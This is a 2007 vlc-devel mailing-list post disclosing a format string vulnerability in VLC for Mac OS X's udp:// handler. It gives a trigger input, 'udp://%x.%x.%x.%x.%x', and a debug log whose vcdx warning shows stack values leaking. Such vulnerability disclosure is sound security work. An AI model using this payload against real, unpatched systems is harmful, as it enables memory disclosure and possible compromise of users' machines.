[vlc-devel] Security hole in VLC media player for Mac...

Kevin Finisterre kfinisterre at cfm.ohio-state.edu
Tue Jan 2 19:31:29 CET 2007 

I have had trouble reporting issues to you guys in the past... I wanted
to at least make an attempt with this issue. This bug is part of the
Month of Apple Bugs... it appears to only affect VLC for OSX.

There is a format string issue in the handling of udp://

udp://%x.%x.%x.%x.%x should be sufficient to trigger the bug.

-- logger module started --
main debug: CPU has capabilities 486 586 MMX MMXEXT SSE SSE2 FPU
main debug: looking for memcpy module: 1 candidate
main debug: using memcpy module "memcpy"
main debug: waiting for thread completion
main debug: thread 3081993136 (playlist) created at priority 0
(src/playlist/playlist.c:183)
main debug: waiting for thread completion
main debug: thread 3073600432 (preparser) created at priority 0
(src/playlist/playlist.c:205)
main debug: looking for interface module: 1 candidate
main debug: using interface module "hotkeys"
main debug: interface initialized
main debug: thread 3065207728 (interface) created at priority 0
(src/interface/interface.c:211)
main debug: looking for interface module: 6 candidates
main debug: using interface module "screensaver"
main debug: interface initialized
main debug: thread 3056815024 (interface) created at priority 0
(src/interface/interface.c:211)
main debug: looking for interface module: 5 candidates
main debug: using interface module "wxwidgets"
main debug: interface initialized
main debug: thread 3033099184 (manager) created at priority 0
(src/interface/interface.c:196)
wxwidgets debug: Using last windows config
'(-1,0,0,1024,768)(0,0,0,633,305)'
wxwidgets debug: id=0 p=(0,0) s=(633,305)
main debug: looking for interface module: 1 candidate
logger: Using the logger interface module...
logger warning: no log filename provided, using `vlc-log.txt'
logger debug: opening logfile `vlc-log.txt'
main debug: using interface module "logger"
main debug: interface initialized
main debug: thread 3008658352 (interface) created at priority 0
(src/interface/interface.c:211)
main debug: looking for interface module: 1 candidate
main debug: using interface module "rc"
main debug: interface initialized
main debug: thread 3000220592 (interface) created at priority 0
(src/interface/interface.c:211)
main debug: adding playlist item `udp://%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
( udp://%x.%x.%x.%x.%x.%x.%x.%x.%x.%x. )
main debug: creating new input thread
main debug: waiting for thread completion
main debug: thread 2991827888 (input) created at priority 0
(src/input/input.c:230)
main debug: `udp://%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.' gives access `udp'
demux `' path `%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
main debug: creating demux: access='udp' demux=''
path='%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
main debug: looking for access_demux module: 0 candidates
main warning: no access_demux module matched "udp"
main debug: creating access 'udp' path='%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
main debug: looking for access2 module: 6 candidates
access_udp debug: opening server=%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.:0
local=:1234
main debug: net: connecting to '[%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.]:0@[]:1234'
main debug: looking for network module: 1 candidate
ipv6 debug: %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.: Name or service not known
ipv6 warning: cannot build remote address
main debug: using network module "ipv6"
main debug: unlocking module "ipv6"
main debug: looking for network module: 1 candidate
ipv4 warning: cannot build remote address
main debug: using network module "ipv4"
main debug: unlocking module "ipv4"
main debug: net: connection to
'[%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.]:0@[]:1234' failed
access_udp error: cannot open socket
vcdx warning: Can't get file status for
b2539a98.b7f581e8.b1d00335.b59c224c.b253985c.b2539c94.b2539c68.b59b3b08.3.b253985c.:
No such file or directory
access_file warning: %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.: No such file or
directory
cdda warning: could not open %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.
main warning: no access2 module matching "udp" could be loaded
main debug: retrying with access `udp' demux `' path `'
main debug: creating access 'udp' path=''
main debug: looking for access2 module: 6 candidates
access_udp debug: opening server=:0 local=:1234
main debug: net: connecting to '[]:0@[]:1234'
main debug: looking for network module: 1 candidate
main debug: using network module "ipv6"
main debug: unlocking module "ipv6"
main debug: using access2 module "access_udp"
main debug: pre buffering
main debug: removing all interfaces
main debug: thread 3000220592 joined (src/interface/interface.c:238)
main debug: unlocking module "rc"
main debug: thread 3008658352 joined (src/interface/interface.c:238)
-- logger module stopped --

-KF

-- 
This is the vlc-devel mailing-list, see http://www.videolan.org/vlc/
To unsubscribe, please read http://developers.videolan.org/lists.html

More information about the vlc-devel mailing list